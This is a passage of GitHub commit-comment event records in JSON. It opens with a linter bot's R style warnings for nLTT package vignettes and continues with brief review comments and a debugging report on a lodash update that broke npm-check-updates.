------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_nltt_statistic.R:21:22:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_nltt_statistic.R#L21) *style:* **Trailing whitespace is superfluous.**\n```r\n​  ape::rcoal(n = 10), \n                     ^\n```\n[inst/doc/vignette_nltt_statistic.R:22:22:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_nltt_statistic.R#L22) *style:* **Trailing whitespace is superfluous.**\n```r\n​  ape::rcoal(n = 10), \n                     ^\n```\n[inst/doc/vignette_nltt_statistic.R:23:16:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_nltt_statistic.R#L23) *style:* **Trailing whitespace is superfluous.**\n```r\n​  species_tree, \n               ^\n```\n[inst/doc/vignette_nltt_statistic.R:27:2:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_nltt_statistic.R#L27) *style:* **Commented code should be removed.**\n```r\n​## ----fig.width = 7, fig.height = 10--------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_nltt_statistic.R:35:2:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_nltt_statistic.R#L35) *style:* **Commented code should be removed.**\n```r\n​## ----fig.width = 7, fig.height = 7---------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_nltt_statistic.R:39:1:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_nltt_statistic.R#L39) *style:* **lines should not be more than 80 characters.**\n```r\n​rect(par(\"usr\")[1],par(\"usr\")[3],par(\"usr\")[2],par(\"usr\")[4], col = colors()[240])\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_nltt_statistic.R:39:20:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_nltt_statistic.R#L39) *style:* **Commas should always have a space after.**\n```r\n​rect(par(\"usr\")[1],par(\"usr\")[3],par(\"usr\")[2],par(\"usr\")[4], col = colors()[240])\n                   ^\n```\n[inst/doc/vignette_nltt_statistic.R:39:34:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_nltt_statistic.R#L39) *style:* **Commas should always have a space after.**\n```r\n​rect(par(\"usr\")[1],par(\"usr\")[3],par(\"usr\")[2],par(\"usr\")[4], col = colors()[240])\n                                 ^\n```\n[inst/doc/vignette_nltt_statistic.R:39:48:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_nltt_statistic.R#L39) *style:* **Commas should always have a space after.**\n```r\n​rect(par(\"usr\")[1],par(\"usr\")[3],par(\"usr\")[2],par(\"usr\")[4], col = colors()[240])\n                                               ^\n```\n[inst/doc/vignette_nltt_statistic.R:45:1:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_nltt_statistic.R#L45) *style:* **lines should not be more than 80 characters.**\n```r\n​  nLTT::nltt_lines(p, lwd = 3, lty = 2, col = grDevices::heat.colors(n = 4)[col_index])\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_nltt_statistic.R:49:2:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_nltt_statistic.R#L49) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_nltt_statistic.R:54:27:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_nltt_statistic.R#L54) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nltt_stats_exact[i]  <- nLTTstat_exact(species_tree, p)\n                          ^~~~~~~~~~~~~~\n```\n[inst/doc/vignette_nltt_statistic.R:55:27:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_nltt_statistic.R#L55) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nltt_stats_approx[i] <- nLTTstat(species_tree, p)\n                          ^~~~~~~~\n```\n[inst/doc/vignette_nltt_statistic.R:59:2:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_nltt_statistic.R#L59) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_nltt_statistic.R:62:38:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_nltt_statistic.R#L62) *style:* **Trailing whitespace is superfluous.**\n```r\n​  nltt_stat_exact = nltt_stats_exact, \n                                     ^\n```\n[inst/doc/vignette_nltt_statistic.R:67:2:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_nltt_statistic.R#L67) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_nltt_statistic.R:69:14:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_nltt_statistic.R#L69) *style:* **Trailing whitespace is superfluous.**\n```r\n​  nltt_stats, \n             ^\n```\n[inst/doc/vignette_nltt_statistic.R:70:21:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_nltt_statistic.R#L70) *style:* **Trailing whitespace is superfluous.**\n```r\n​  id.vars = c(\"id\"), \n                    ^\n```\n[inst/doc/vignette_nltt_statistic.R:76:13:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_nltt_statistic.R#L76) *style:* **Trailing whitespace is superfluous.**\n```r\n​  df$method, \n            ^\n```\n[inst/doc/vignette_nltt_statistic.R:80:2:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_nltt_statistic.R#L80) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_nltt_statistic.R:82:13:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_nltt_statistic.R#L82) *style:* **Trailing whitespace is superfluous.**\n```r\n​  data = df, \n            ^\n```\n[inst/doc/vignette_nltt_statistic.R:89:1:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_nltt_statistic.R#L89) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:1:2:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_stretch_nltt_matrix.R#L1) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:3:9:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_stretch_nltt_matrix.R#L3) *style:* **Variable and function names should be all lowercase.**\n```r\n​library(nLTT)\n        ^~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:6:2:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_stretch_nltt_matrix.R#L6) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:10:1:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_stretch_nltt_matrix.R#L10) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​add.scale.bar()\n^~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:12:2:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_stretch_nltt_matrix.R#L12) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:15:2:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_stretch_nltt_matrix.R#L15) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:19:2:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_stretch_nltt_matrix.R#L19) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:21:27:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_stretch_nltt_matrix.R#L21) *style:* **Put spaces around all infix operators.**\n```r\n​points(nltt, pch = 19, col=\"red\")\n                         ~^~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:23:2:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_stretch_nltt_matrix.R#L23) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:25:1:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_stretch_nltt_matrix.R#L25) *style:* **lines should not be more than 80 characters.**\n```r\n​stretch_matrix <- nLTT::stretch_nltt_matrix(nltt, dt = 0.25, step_type = \"upper\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:28:2:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_stretch_nltt_matrix.R#L28) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:30:27:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_stretch_nltt_matrix.R#L30) *style:* **Put spaces around all infix operators.**\n```r\n​points(nltt, pch = 19, col=\"red\")\n                         ~^~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:31:37:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_stretch_nltt_matrix.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​points(stretch_matrix, pch = 19, col=\"blue\")\n                                   ~^~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:33:2:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_stretch_nltt_matrix.R#L33) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:37:1:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_stretch_nltt_matrix.R#L37) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​add.scale.bar()\n^~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:39:2:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_stretch_nltt_matrix.R#L39) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:42:2:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_stretch_nltt_matrix.R#L42) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:46:2:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_stretch_nltt_matrix.R#L46) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:48:27:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_stretch_nltt_matrix.R#L48) *style:* **Put spaces around all infix operators.**\n```r\n​points(nltt, pch = 19, col=\"red\")\n                         ~^~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:50:2:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_stretch_nltt_matrix.R#L50) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:52:1:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_stretch_nltt_matrix.R#L52) *style:* **lines should not be more than 80 characters.**\n```r\n​stretch_matrix <- nLTT::stretch_nltt_matrix(nltt, dt = 0.25, step_type = \"upper\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:55:2:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_stretch_nltt_matrix.R#L55) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:57:27:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_stretch_nltt_matrix.R#L57) *style:* **Put spaces around all infix operators.**\n```r\n​points(nltt, pch = 19, col=\"red\")\n                         ~^~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:58:37:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_stretch_nltt_matrix.R#L58) *style:* **Put spaces around all infix operators.**\n```r\n​points(stretch_matrix, pch = 19, col=\"blue\")\n                                   ~^~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:60:2:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_stretch_nltt_matrix.R#L60) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:61:1:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_stretch_nltt_matrix.R#L61) *style:* **lines should not be more than 80 characters.**\n```r\n​newick <- \"((((XD:1,ZD:1):1,CE:2):1,(FE:2,EE:2):1):4,((AE:1,BE:1):1,(WD:1,YD:1):1):5);\"\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:64:1:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_stretch_nltt_matrix.R#L64) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​add.scale.bar()\n^~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:66:2:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_stretch_nltt_matrix.R#L66) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:69:2:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_stretch_nltt_matrix.R#L69) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n"}},"created_at":"2016-09-14T08:21:39Z"}
{"id":"4560521407","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":19014346,"position":null,"line":null,"path":null,"commit_id":"00688a4338ca5859fbf18c135b80f53c5ed2d6a8","created_at":"2016-09-14T08:22:13Z","updated_at":"2016-09-14T08:22:13Z","body":"Related to: backdrop/backdrop-issues#1705 "}},"created_at":"2016-09-14T08:22:13Z"}
{"id":"4560521418","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":19014347,"position":null,"line":null,"path":null,"commit_id":"40a3507c6d763e73d27afaedbfe5bb0655d802cf","created_at":"2016-09-14T08:22:13Z","updated_at":"2016-09-14T08:22:13Z","body":"Related to: backdrop/backdrop-issues#1705 "}},"created_at":"2016-09-14T08:22:13Z"}
{"id":"4560521428","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":19014348,"position":null,"line":null,"path":null,"commit_id":"b042ea34806ddae8aaa5389ae09ae71b9f0243e8","created_at":"2016-09-14T08:22:13Z","updated_at":"2016-09-14T08:22:13Z","body":"Related to: backdrop/backdrop-issues#1705 "}},"created_at":"2016-09-14T08:22:13Z"}
{"id":"4560522010","type":"CommitCommentEvent","actor":{"login":"jimbo1qaz"},"repo":{"name":"droidmjt/Droidsound"},"payload":{"comment":{"id":19014350,"position":null,"line":null,"path":null,"commit_id":"2f0f0beee28aa22a76ea3a6e6799ad5d90595185","created_at":"2016-09-14T08:22:20Z","updated_at":"2016-09-14T08:22:20Z","body":"Did you add lock screen spectrogram? Can we turn it off?"}},"created_at":"2016-09-14T08:22:20Z"}
{"id":"4560522172","type":"CommitCommentEvent","actor":{"login":"ader1990"},"repo":{"name":"cosminmocan/heat-templates"},"payload":{"comment":{"id":19014352,"position":359,"line":144,"path":"hot/Windows/MSSQLServer/MSSQL.psm1","commit_id":"3204a3570995a370cfb25ffeec7ad69ccb0cbdc3","created_at":"2016-09-14T08:22:22Z","updated_at":"2016-09-14T08:22:22Z","body":"this cannot work, as driveletter is not set"}},"created_at":"2016-09-14T08:22:22Z"}
{"id":"4560527868","type":"CommitCommentEvent","actor":{"login":"laggingreflex"},"repo":{"name":"tjunnone/npm-check-updates"},"payload":{"comment":{"id":19014364,"position":20,"line":57,"path":"package.json","commit_id":"ea2e4009749acfc12372f99210fc55ab43e96cc3","created_at":"2016-09-14T08:23:38Z","updated_at":"2016-09-14T08:23:38Z","body":"I'm not completely sure why but I think this latest lodash update is breaking things. \r\n\r\n[Here](https://github.com/tjunnone/npm-check-updates/blob/master/lib/versionmanager.js#L343) that `_.partialRight(_.pick, _.identity)` thing (which I believe to [Remove empty properties / falsy values from Object](http://stackoverflow.com/questions/14058193/remove-empty-properties-falsy-values-from-object-with-underscore-js#comment41184386_23708667)?) doesn't behave the same anymore with lodash update.\r\n\r\nI put a small code to debug what it was doing (or why it wasn't working)\r\n\r\n    // .then(_.partialRight(_.pick, _.identity));\r\n    .then(_.partialRight(_.pick, x => {\r\n        console.log('x:', x);\r\n        const fn = _.partialRight(_.pick, _.identity);\r\n        console.log('_.pick:', _.pick);\r\n        const y = fn(x);\r\n        console.log('y:', y);\r\n        return y;\r\n    }));\r\n\r\nHere's the result (with the latest lodash)\r\n\r\n    x: { 'babel-core': '6.14.0' }\r\n    _.pick: function () {\r\n            var args = arguments,\r\n                index = -1,\r\n                length = nativeMax(args.length - start, 0),\r\n                array = Array(length);\r\n\r\n            while (++index < length) {\r\n              array[index] = args[start + index];\r\n            }\r\n            index = -1;\r\n            var otherArgs = Array(start + 1);\r\n            while (++index < start) {\r\n              otherArgs[index] = args[index];\r\n            }\r\n            otherArgs[start] = array;\r\n            return apply(func, this, otherArgs);\r\n          }\r\n    y: {}\r\n\r\nThe result `y` should be unchanged but it's empty.\r\n\r\nFor comparison here's the same result from before the lodash update\r\n\r\n    x: { 'babel-core': '6.14.0' }\r\n    _.pick: function () {\r\n            var args = arguments,\r\n                index = -1,\r\n                length = nativeMax(args.length - start, 0),\r\n                rest = Array(length);\r\n\r\n            while (++index < length) {\r\n              rest[index] = args[start + index];\r\n            }\r\n            switch (start) {\r\n              case 0: return func.call(this, rest);\r\n              case 1: return func.call(this, args[0], rest);\r\n              case 2: return func.call(this, args[0], args[1], rest);\r\n            }\r\n            var otherArgs = Array(start + 1);\r\n            index = -1;\r\n            while (++index < start) {\r\n              otherArgs[index] = args[index];\r\n            }\r\n            otherArgs[start] = rest;\r\n            return func.apply(this, otherArgs);\r\n          }\r\n    y: { 'babel-core': '6.14.0' }\r\n\r\n"}},"created_at":"2016-09-14T08:23:38Z"}
{"id":"4560528325","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":19014368,"position":null,"line":null,"path":null,"commit_id":"5e0a3b80164e8f2631422c13d94a1e95b2bd35a6","created_at":"2016-09-14T08:23:44Z","updated_at":"2016-09-14T08:23:44Z","body":"Related to: backdrop/backdrop-issues#1231 "}},"created_at":"2016-09-14T08:23:44Z"}
{"id":"4560528895","type":"CommitCommentEvent","actor":{"login":"rikterbeek"},"repo":{"name":"Adyen/adyen-magento"},"payload":{"comment":{"id":19014370,"position":53,"line":53,"path":"app/code/community/Adyen/Payment/Block/Form/ApplePay.php","commit_id":"aa5051d5370452d241429433dedcc12f5626c8cd","created_at":"2016-09-14T08:23:51Z","updated_at":"2016-09-14T08:23:51Z","body":"done"}},"created_at":"2016-09-14T08:23:51Z"}
{"id":"4560531639","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":19014375,"position":null,"line":null,"path":null,"commit_id":"ddedd17e8f10dc1b05ecb3d68c4c4737ddb0d4aa","created_at":"2016-09-14T08:24:27Z","updated_at":"2016-09-14T08:24:27Z","body":"Related to: backdrop/backdrop-issues#1231 "}},"created_at":"2016-09-14T08:24:27Z"}
{"id":"4560535470","type":"CommitCommentEvent","actor":{"login":"pmackay"},"repo":{"name":"valueflows/valueflows"},"payload":{"comment":{"id":19014380,"position":null,"line":null,"path":null,"commit_id":"a9fdc6f9045d858eb45b99d1a2a4044ca775f0ee","created_at":"2016-09-14T08:25:16Z","updated_at":"2016-09-14T08:25:16Z","body":"@fosterlynn would be great to add a quick description at the top outlining what this list of files is capturing."}},"created_at":"2016-09-14T08:25:16Z"}
{"id":"4560535667","type":"CommitCommentEvent","actor":{"login":"kathrynwebb91"},"repo":{"name":"kathrynwebb91/ResumeWebsiteExample"},"payload":{"comment":{"id":19014383,"position":null,"line":null,"path":null,"commit_id":"678d084df567bdb33c599c1beb216e001932c887","created_at":"2016-09-14T08:25:18Z","updated_at":"2016-09-14T08:25:18Z","body":"Also added fonts and hex inner text formatting"}},"created_at":"2016-09-14T08:25:18Z"}
{"id":"4560535853","type":"CommitCommentEvent","actor":{"login":"ader1990"},"repo":{"name":"cosminmocan/heat-templates"},"payload":{"comment":{"id":19014384,"position":347,"line":132,"path":"hot/Windows/MSSQLServer/MSSQL.psm1","commit_id":"3204a3570995a370cfb25ffeec7ad69ccb0cbdc3","created_at":"2016-09-14T08:25:20Z","updated_at":"2016-09-14T08:25:20Z","body":"make a test to see if the path exists (mediainfo) -- if not, throw an error"}},"created_at":"2016-09-14T08:25:20Z"}
{"id":"4560538412","type":"CommitCommentEvent","actor":{"login":"ader1990"},"repo":{"name":"cosminmocan/heat-templates"},"payload":{"comment":{"id":19014393,"position":347,"line":132,"path":"hot/Windows/MSSQLServer/MSSQL.psm1","commit_id":"3204a3570995a370cfb25ffeec7ad69ccb0cbdc3","created_at":"2016-09-14T08:25:53Z","updated_at":"2016-09-14T08:25:53Z","body":"typo here -- you have an extra caps A n XMLP[A]th"}},"created_at":"2016-09-14T08:25:53Z"}
{"id":"4560538426","type":"CommitCommentEvent","actor":{"login":"rikterbeek"},"repo":{"name":"Adyen/adyen-magento"},"payload":{"comment":{"id":19014394,"position":57,"line":57,"path":"app/code/community/Adyen/Payment/Model/Adyen/ApplePay.php","commit_id":"aa5051d5370452d241429433dedcc12f5626c8cd","created_at":"2016-09-14T08:25:53Z","updated_at":"2016-09-14T08:25:53Z","body":"done"}},"created_at":"2016-09-14T08:25:53Z"}
{"id":"4560543494","type":"CommitCommentEvent","actor":{"login":"fnoks"},"repo":{"name":"h5p/h5p-editor-php-library"},"payload":{"comment":{"id":19014404,"position":null,"line":null,"path":null,"commit_id":"59f14677dcb68568a263cb0803150458d0e5cabf","created_at":"2016-09-14T08:27:05Z","updated_at":"2016-09-14T08:27:05Z","body":"I agree that this API-change is unnecessary. I will remove the function.\r\n\r\n"}},"created_at":"2016-09-14T08:27:05Z"}
